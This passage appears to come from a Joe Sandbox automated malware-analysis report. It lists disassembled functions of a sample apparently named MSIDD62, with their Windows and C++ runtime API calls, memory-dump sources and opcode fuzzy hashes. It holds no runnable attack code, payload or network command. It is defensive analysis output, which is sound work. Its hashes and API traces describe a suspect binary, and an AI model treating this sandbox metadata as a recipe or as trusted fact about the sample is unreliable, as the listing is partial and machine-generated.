                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00429DA0,000000FF,?,003E6432,00000000), ref: 003E6D87
                                                                      • LocalFree.KERNEL32(?,755CD0F6,00000000,004293B0,000000FF,?,00000000,00000000,00429DA0,000000FF,755CD0F6), ref: 003E6E0D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree
                                                                      • String ID: 2d>$2d>
                                                                      • API String ID: 2012307162-3886783025
                                                                      • Opcode ID: 4ad4374caeaf6941bcb044232cccb26eee078413720aa426c01ebbeb0085e242
                                                                      • Instruction ID: 4d6eb2d8d0fd45c795c018ab320515bc09e02283d6afe73979ffba238ecba989
                                                                      • Opcode Fuzzy Hash: 4ad4374caeaf6941bcb044232cccb26eee078413720aa426c01ebbeb0085e242
                                                                      • Instruction Fuzzy Hash: BE51AEB5A002559FCB19CF69C986AAEBBB4FB58350F54432DE815E73C0D730AD10CB94
                                                                      Function 003EB500 Relevance: 9.2, APIs: 6, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EB52D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003EB550
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EB578
                                                                      • std::_Facet_Register.LIBCPMT ref: 003EB5ED
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003EB617
                                                                      • LocalFree.KERNEL32 ref: 003EB6C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_FreeLocalRegister
                                                                      • String ID:
                                                                      • API String ID: 1378673503-0
                                                                      • Opcode ID: efe290b6b8bb26be9978b4d0964381c934585283c6a5b800c40a8d15c0af324d
                                                                      • Instruction ID: e5ee15ee1ffd8cf5cd3c2a16a4fea0613aa7696cc5434a852346e272f4c1d914
                                                                      • Opcode Fuzzy Hash: efe290b6b8bb26be9978b4d0964381c934585283c6a5b800c40a8d15c0af324d
                                                                      • Instruction Fuzzy Hash: A751BE759006A9DFCB22DF59D840BAAFBB4FF06320F14476AE811A73D1D774AA04CB94
                                                                      Function 00415981 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: __freea$__alloca_probe_16
                                                                      • String ID: a/p$am/pm
                                                                      • API String ID: 3509577899-3206640213
                                                                      • Opcode ID: dbd8079354d5478d843c18b2b0158f87bf52aff7121b6ae1f7fd6fd630aa8ca8
                                                                      • Instruction ID: 61c585d8eb13a78e82967446422288e270fea856709cd589c2496a0930c318e2
                                                                      • Opcode Fuzzy Hash: dbd8079354d5478d843c18b2b0158f87bf52aff7121b6ae1f7fd6fd630aa8ca8
                                                                      • Instruction Fuzzy Hash: 2FC1C171904A06DACB249F68D489AFB7770FF86304F24814BE501AB754D33D9DC1CB9A
                                                                      Function 0040AEF5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(?,?,0040AEEC,00409710,004085A3), ref: 0040AF03
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040AF11
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040AF2A
                                                                      • SetLastError.KERNEL32(00000000,0040AEEC,00409710,004085A3), ref: 0040AF7C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastValue___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 3852720340-0
                                                                      • Opcode ID: d27d2d4a4a8db9bf093b34df8ef4a0272090e01967c5dfaab12f08fa9691f651
                                                                      • Instruction ID: ea3fb0c165e55a81ce424da4900f0c37453ab16568a5a12c944ccd3a546bb3c1
                                                                      • Opcode Fuzzy Hash: d27d2d4a4a8db9bf093b34df8ef4a0272090e01967c5dfaab12f08fa9691f651
                                                                      • Instruction Fuzzy Hash: AE01287260D3229EE6242BB67CC6A1B6645DB12B79720033FF110761F2EF7D4D21614D
                                                                      Function 003F45A7 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F45AE
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                        • Part of subcall function 003E84C0: LocalAlloc.KERNEL32(00000040,00000000,0040839D,00000000,755CD0F6,?,00000000,?,00000000,?,0042CB8D,000000FF,?,003E17D5,00000000,0042D3BA), ref: 003E84C6
                                                                        • Part of subcall function 003EC0B0: __Getctype.LIBCPMT ref: 003EC112
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$AllocGetctypeH_prolog3LocalLockit::_Lockit::~_
                                                                      • String ID: lHD$pHD$tHD$xHD
                                                                      • API String ID: 3791111190-587920680
                                                                      • Opcode ID: 232605f0878a81df308de179195815261465bac67ab5163ae764cdf9618f72ce
                                                                      • Instruction ID: 55c34f9a92dfcdd21f9d2552281f0f5ff1b38f276f00e17b39b64589a73d277e
                                                                      • Opcode Fuzzy Hash: 232605f0878a81df308de179195815261465bac67ab5163ae764cdf9618f72ce
                                                                      • Instruction Fuzzy Hash: CC51B7B190021EABEB137F668C42A7F7A6CEF42354F15452AFA15AE181EF748D0086E5
                                                                      Function 003FD38D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Mpunct$GetvalsH_prolog3
                                                                      • String ID: $+xv
                                                                      • API String ID: 2204710431-1686923651
                                                                      • Opcode ID: 0183176cb70b9adb3c7c24fa0ee114fcbb9788bc898a5472e26d3d91c9f9c142
                                                                      • Instruction ID: d60a9f95c9368112be44310d0ea99e305187f41728581cfa5405d429164bb2da
                                                                      • Opcode Fuzzy Hash: 0183176cb70b9adb3c7c24fa0ee114fcbb9788bc898a5472e26d3d91c9f9c142
                                                                      • Instruction Fuzzy Hash: 8021B2B1904B966FD726DF75849473BBFF8AB0D300B04491EE599CBA42E734E601CB90
                                                                      Function 003E83E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(755CD0F6,755CD0F6,?,?,00000000,0042A221,000000FF), ref: 003E847B
                                                                        • Part of subcall function 00407875: EnterCriticalSection.KERNEL32(00444AF8,00000000,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26), ref: 00407880
                                                                        • Part of subcall function 00407875: LeaveCriticalSection.KERNEL32(00444AF8,?,?,003E25B6,0044571C,755CD0F6,?,00000000,004293ED,000000FF,?,003E1A26,?,?,?,755CD0F6), ref: 004078BD
                                                                      • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 003E8440
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003E8447
                                                                        • Part of subcall function 0040782B: EnterCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407835
                                                                        • Part of subcall function 0040782B: LeaveCriticalSection.KERNEL32(00444AF8,?,?,003E2627,0044571C,0042CCC0), ref: 00407868
                                                                        • Part of subcall function 0040782B: RtlWakeAllConditionVariable.NTDLL ref: 004078DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                      • String ID: IsWow64Process$kernel32
                                                                      • API String ID: 2056477612-3789238822
                                                                      • Opcode ID: 930a0c3d0987b7bd1d773d4828dbb923da7f3ddf04d6a2714b43495823aa9aa2
                                                                      • Instruction ID: d8637fd8be78d55ada56985ef9a68356c3d0c379b5482ca84f0bc431d01c84af
                                                                      • Opcode Fuzzy Hash: 930a0c3d0987b7bd1d773d4828dbb923da7f3ddf04d6a2714b43495823aa9aa2
                                                                      • Instruction Fuzzy Hash: AD11D2B2D04B55EFCB20CFA5EC05B59B7A8F709724F10477AE815A33D0DB39A900CA98
                                                                      Function 003F26F9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F2700
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F270A
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F275B
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F277B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: lHD
                                                                      • API String ID: 2854358121-4154305490
                                                                      • Opcode ID: 4d19b201ac16dc9078ac224629bde84bbedd85010c378ac4fd4603d0503119fe
                                                                      • Instruction ID: d7bccca80e7ee6d2ee2f8331678ab6fa5dfd7fe70c603a629f431d40846c9a78
                                                                      • Opcode Fuzzy Hash: 4d19b201ac16dc9078ac224629bde84bbedd85010c378ac4fd4603d0503119fe
                                                                      • Instruction Fuzzy Hash: 9E01C47590061DDBCB02FBA5C8456BEB7A5AF94310F244519EA206B3D2CF349E059BC4
                                                                      Function 003F278E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F2795
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F279F
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F27F0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F2810
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: pHD
                                                                      • API String ID: 2854358121-3802264006
                                                                      • Opcode ID: 51badf8817e0e8d893f3edc99cb7cb3b030f1df2f4cc732f19b9f325326def85
                                                                      • Instruction ID: 36a85e3135cd0907ebef9cd8e1baaf8f71753627d5bbbb30382a4aa5bf57291b
                                                                      • Opcode Fuzzy Hash: 51badf8817e0e8d893f3edc99cb7cb3b030f1df2f4cc732f19b9f325326def85
                                                                      • Instruction Fuzzy Hash: 0A01D23990062DDBCF06FBA4D8056BFB7A5AF95320F25051DE611AF2D2DF349E028B94
                                                                      Function 004039EB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 004039F2
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004039FC
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403A4D
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403A6D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: lJD
                                                                      • API String ID: 2854358121-3316369744
                                                                      • Opcode ID: a4175a6803f1e710eb6c27bbe58f2847dbf15ea4c37835ac1400cbc756a2be03
                                                                      • Instruction ID: 403b843a449813cda2db50056ccaa437625fe576d81646a008215a346943d16c
                                                                      • Opcode Fuzzy Hash: a4175a6803f1e710eb6c27bbe58f2847dbf15ea4c37835ac1400cbc756a2be03
                                                                      • Instruction Fuzzy Hash: ED01C475A006199FCF02EFA4C8456BEBB75AF94310F24412AE5107B3D2DF389F058B88
                                                                      Function 00403A80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00403A87
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403A91
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403AE2
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403B02
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: pJD
                                                                      • API String ID: 2854358121-3499594564
                                                                      • Opcode ID: 302ffa449e3e6734c7128c19779e53a63a7e38fc52fd5960487bb0354633947f
                                                                      • Instruction ID: b8d671914e744da837f9a84db1167dd5445a4c61d9bbd16796a73dabaebde34e
                                                                      • Opcode Fuzzy Hash: 302ffa449e3e6734c7128c19779e53a63a7e38fc52fd5960487bb0354633947f
                                                                      • Instruction Fuzzy Hash: 3201C8359006199FCF12EFA4D8466BE7B75AF84310F24052AE5117B3D2DF789E018B88
                                                                      Function 00403C3F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00403C46
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403C50
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403CA1
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403CC1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: |JD
                                                                      • API String ID: 2854358121-3649923616
                                                                      • Opcode ID: f2a18ded649ba0eff170a70b3563694c956bcbad085f0a190747bcd927346821
                                                                      • Instruction ID: 0d4ebfafd99f01df37e713658a20bc63eb1acbe0cbaae429993ad3116168f4d9
                                                                      • Opcode Fuzzy Hash: f2a18ded649ba0eff170a70b3563694c956bcbad085f0a190747bcd927346821
                                                                      • Instruction Fuzzy Hash: 2B0108769005199BCB02EFA5C8056BEBB65AF84710F14442AE910BB3C1CF389E018BC8
                                                                      Function 003F7E71 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7E78
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7E82
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7ED3
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7EF3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: ID
                                                                      • API String ID: 2854358121-3023824217
                                                                      • Opcode ID: 960007b23d11b8e07b99d5faf367cd037b1e076f456c3c7c6058f9917522e476
                                                                      • Instruction ID: d3bc7e779990e8152bc9c1804cd1e0f957ae14c67ecbb9761aa95c6089023a40
                                                                      • Opcode Fuzzy Hash: 960007b23d11b8e07b99d5faf367cd037b1e076f456c3c7c6058f9917522e476
                                                                      • Instruction Fuzzy Hash: 9A01D27590162D9BCF03EBA4D8467BEB7A1AF94310F24055AE610AF3D2DF349E028BD4
                                                                      Function 003F7F9B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7FA2
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7FAC
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7FFD
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F801D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID: ID
                                                                      • API String ID: 2854358121-3023824217
                                                                      • Opcode ID: 690c5aa9bde1be25f6e0d7545b7907ac768035aa3f49d0d470542fff5bc0c626
                                                                      • Instruction ID: 7c32efd6fb47e1388c63cef68ef20d3bfe781d19796261263a18757880d54204
                                                                      • Opcode Fuzzy Hash: 690c5aa9bde1be25f6e0d7545b7907ac768035aa3f49d0d470542fff5bc0c626
                                                                      • Instruction Fuzzy Hash: B501D67590061DDBCF06EB64D8467BE77A1AF94320F25011EE610AF2D2DF349E019B85
                                                                      Function 00418461 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,755CD0F6,?,?,00000000,0042CBE4,000000FF,?,004183F1,?,?,004183C5,?), ref: 00418496
                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004184A8
                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,0042CBE4,000000FF,?,004183F1,?,?,004183C5,?), ref: 004184CA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 48b295f55f0f1d47bc2d4be45410bdc21de1f6162403a9cc2e7e89a0777af140
                                                                      • Instruction ID: ca295bc982d5305fbd7f6ffc776fe9782d29dac52fd600b0e8c156cf20cd256a
                                                                      • Opcode Fuzzy Hash: 48b295f55f0f1d47bc2d4be45410bdc21de1f6162403a9cc2e7e89a0777af140
